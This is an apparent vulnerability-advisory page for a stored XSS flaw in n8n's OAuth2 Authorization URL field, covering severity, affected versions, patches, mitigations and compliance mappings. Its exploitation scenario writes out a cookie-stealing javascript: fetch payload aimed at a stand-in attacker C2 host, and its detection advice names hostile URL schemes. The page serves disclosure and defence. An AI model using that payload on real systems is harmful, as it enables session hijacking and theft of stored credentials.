GHSA-364x-8g5j-x2pr: n8n: stored XSS via malicious OAuth2 Authorization URL

GHSA-364x-8g5j-x2pr MEDIUM
Published March 27, 2026
CISO Take

Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.

What is the risk?

Nominal CVSS 5.4 (medium) understates real-world risk in AI-heavy environments. n8n instances typically hold credentials for dozens of upstream services—LLM APIs, vector databases, data warehouses—making session takeover disproportionately damaging. Exploitability is trivial once the attacker has any credential-creation permission; no AI/ML knowledge required. Insider threat and credential-sharing abuse patterns are realistic vectors. Organizations with large n8n deployments shared across teams face the highest exposure.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
n8n npm >= 2.7.0, < 2.8.0 2.8.0
194.3K OpenSSF 6.6 Pushed 6d ago 53% patched ~7d to patch Full package profile →

Do you use n8n? You're affected.

How severe is it?

CVSS 3.1
5.4 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI Required
S Changed
C Low
I Low
A None

What should I do?

5 steps
  1. PATCH

    Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field.

  2. AUDIT

    Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials.

  3. RESTRICT

    Tighten credential creation and sharing permissions to the minimum necessary set of users until patched.

  4. DETECT

    Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints.

  5. SCOPE

    Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
6.1.2 - AI Risk Assessment 8.4 - AI System Operation A.10.2 - AI system operational controls — input/output management A.6.2 - Roles and responsibilities for AI risk
NIST AI RMF
GOVERN 6.1 - Policies for vulnerability and incident response MANAGE 2.4 - Residual risks are managed MANAGE-2.2 - Mechanisms to respond to harmful AI incidents
OWASP LLM Top 10
LLM05:2025 - Improper Output Handling LLM07:2025 - System Prompt Leakage LLM08:2025 - Excessive Agency

Frequently Asked Questions

What is GHSA-364x-8g5j-x2pr?

Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.

Is GHSA-364x-8g5j-x2pr actively exploited?

No confirmed active exploitation of GHSA-364x-8g5j-x2pr has been reported, but organizations should still patch proactively.

How to fix GHSA-364x-8g5j-x2pr?

1. PATCH: Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field. 2. AUDIT: Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials. 3. RESTRICT: Tighten credential creation and sharing permissions to the minimum necessary set of users until patched. 4. DETECT: Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints. 5. SCOPE: Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.

What systems are affected by GHSA-364x-8g5j-x2pr?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI automation pipelines, workflow orchestration, LLM API integration layers.

What is the CVSS score for GHSA-364x-8g5j-x2pr?

GHSA-364x-8g5j-x2pr has a CVSS v3.1 base score of 5.4 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

agent frameworksAI automation pipelinesworkflow orchestrationLLM API integration layers

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link
AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0053 AI Agent Tool Invocation
AML.T0055 Unsecured Credentials
AML.T0081 Modify AI Agent Configuration
AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: 6.1.2, 8.4, A.10.2, A.6.2
NIST AI RMF: GOVERN 6.1, MANAGE 2.4, MANAGE-2.2
OWASP LLM Top 10: LLM05:2025, LLM07:2025, LLM08:2025

What are the technical details?

Original Advisory

## Impact An authenticated user with permission to create and share credentials could craft a malicious OAuth2 credential containing a JavaScript URL in the Authorization URL field. If a victim opened the credential and interacted with the OAuth authorization button, the injected script would execute in their browser session. ## Patches The issue has been fixed in n8n versions 2.8.0 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability. ## Workarounds If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit credential creation and sharing permissions to fully trusted users only. - Restrict access to the n8n instance to trusted users only. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Exploitation Scenario

A disgruntled team member or attacker who has compromised a low-privilege n8n account (e.g., a developer account) creates an OAuth2 credential named something innocuous like 'Slack Integration (Prod)'. In the Authorization URL field they inject: javascript:fetch('https://c2.attacker.io/x?s='+document.cookie). They share this credential with a target admin. The admin, seeing a familiar-looking credential, opens it and clicks the 'Connect' or 'Authorize' button to verify or update it. The injected script executes in the admin's browser session, exfiltrating session cookies to the attacker's C2. The attacker replays the session token, gaining full admin access to n8n and all stored credentials—including OpenAI API keys, database connection strings, and downstream service tokens.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Timeline

Published
March 27, 2026
Last Modified
March 27, 2026
First Seen
March 27, 2026

Related Vulnerabilities